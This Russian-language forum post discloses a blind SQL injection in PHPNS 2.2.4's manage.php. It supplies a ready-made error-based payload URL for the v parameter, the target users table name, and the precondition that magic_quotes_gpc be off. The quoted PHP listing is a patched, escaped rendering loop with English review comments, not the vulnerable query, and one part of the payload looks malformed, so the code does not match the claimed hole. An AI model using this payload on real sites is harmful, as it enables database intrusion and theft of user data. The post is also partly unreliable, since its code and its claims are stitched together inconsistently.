
16.11.2009, 01:13
PHPNS version 2.2.4 BLIND SQL INJECTION
Уязвимый скрипт — manage.php (ниже приведён фрагмент формирования строк таблицы; сам запрос, в который попадает параметр v, в листинг не включён):
PHP код:
...
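// Render one management-table row per article in $item_list.
// Reads:  $item_list (mysql result), $globalvars['time_format'] / ['altcolor'],
//         $databaseinfo['prefix'], $row_bg.
// Writes: $row_bg (alternates every row), $table_rows (HTML appended).
// Titles, author names and category names are stored input echoed back to an admin page;
// the original emitted them unescaped (stored XSS) and also broke the title="" attribute
// by nesting raw double quotes. Every DB-sourced value is now escaped for the context it
// lands in (HTML text/attribute, URL query, SQL literal).
// NOTE(review): the query that consumes manage.php?v=... (the injection point reported in
// this post) is not part of this excerpt; this block only renders rows already fetched.
while ($item_row = mysql_fetch_array($item_list)) { // for each item in db
    // Convert the stored timestamp to a human-readable date.
    $item_row['timestamp'] = date($globalvars['time_format'], $item_row['timestamp']);
    $item_row['article_cat_name'] = gen_cat_name($item_row['article_cat']); // switch cat_id to readable name
    // Alternate the row background colour (config value, not user data).
    $row_bg = ($row_bg == $globalvars['altcolor'][2]) ? $globalvars['altcolor'][1] : $globalvars['altcolor'][2];

    // Switch the active column to Yes, Draft or Unapproved (fixed markup, not user data).
    if ($item_row['active'] == 1) {
        $item_row['active'] = '<span class="positive">Yes</span>';
    } elseif ($item_row['active'] == 0) {
        $item_row['active'] = '<span class="negative">Draft</span>';
    }
    if ($item_row['approved'] == 0) {
        $item_row['active'] = '<span class="negative">Unapproved</span>';
    }

    // Comment count. The id comes from the database rather than the request, but it is
    // still interpolated into a SQL literal, so escape it instead of trusting the stored
    // value (second-order injection). Same mysql_* API the rest of this file relies on.
    $comment_query = 'SELECT * FROM ' . $databaseinfo['prefix'] . 'comments WHERE article_id="'
        . mysql_real_escape_string($item_row['id']) . '"';
    $item_row['comments'] = mysql_num_rows(general_query($comment_query));

    // Escape once per output context.
    $id_url        = rawurlencode($item_row['id']);
    $id_attr       = htmlspecialchars($item_row['id'], ENT_QUOTES, 'UTF-8');
    $title_html    = htmlspecialchars($item_row['article_title'], ENT_QUOTES, 'UTF-8');
    $author_html   = htmlspecialchars($item_row['article_author'], ENT_QUOTES, 'UTF-8');
    $author_url    = rawurlencode($item_row['article_author']);
    $cat_url       = rawurlencode($item_row['article_cat']);
    // NOTE(review): assumes gen_cat_name() returns plain text, not markup — confirm.
    $cat_name_html = htmlspecialchars($item_row['article_cat_name'], ENT_QUOTES, 'UTF-8');

    // wordwrap() without the cut flag only replaces whitespace, so wrapping the already-
    // escaped title cannot split an entity. The length check stays on the raw title as before.
    $title_cell = $title_html;
    if (strlen($item_row['article_title']) > 30) {
        $title_cell = wordwrap($title_html, 30, "<br />");
    }
    // Attribute value: the original wrote title="edit "<title>"", which terminates the
    // attribute early; use &quot; for the inner quotes.
    $edit_title = 'edit &quot;' . $title_html . '&quot;';

    // Generate the actual HTML row.
    $table_rows .= '<tr bgcolor="' . $row_bg . '">
<td>
<a href="article.php?id=' . $id_url . '&do=edit"><img src="images/icons/edit.png" class="row_icon" alt="edit icon" title="' . $edit_title . '" /></a>
<a href="article.php?id=' . $id_url . '&do=edit" title="' . $edit_title . '"><strong>' . $title_cell . '</strong></a>
</td>
<td><a href="manage.php?v=' . $cat_url . '">' . $cat_name_html . '</a></td>
<td>' . $item_row['timestamp'] . '</td>
<td><a href="manage.php?v=' . $author_url . '">' . $author_html . '</a></td>
<td align="center"><a href="article.php?do=comments&id=' . $id_url . '">' . $item_row['comments'] . '</a></td>
<td align="center">' . $item_row['active'] . '</td>
<td class="checkbox"><input type="checkbox" value="' . $id_attr . '" name="' . $id_attr . '"></td></tr>';
} // end of each item in db generation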
...
Реализация:
Код:
http://localhost/15/manage.php?v=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
Таблица с юзерами: phpns_users
Для успешной реализации требуется magic_quotes_gpc = off: в payload после значения параметра v используется неэкранированная одинарная кавычка, которую magic_quotes экранировали бы.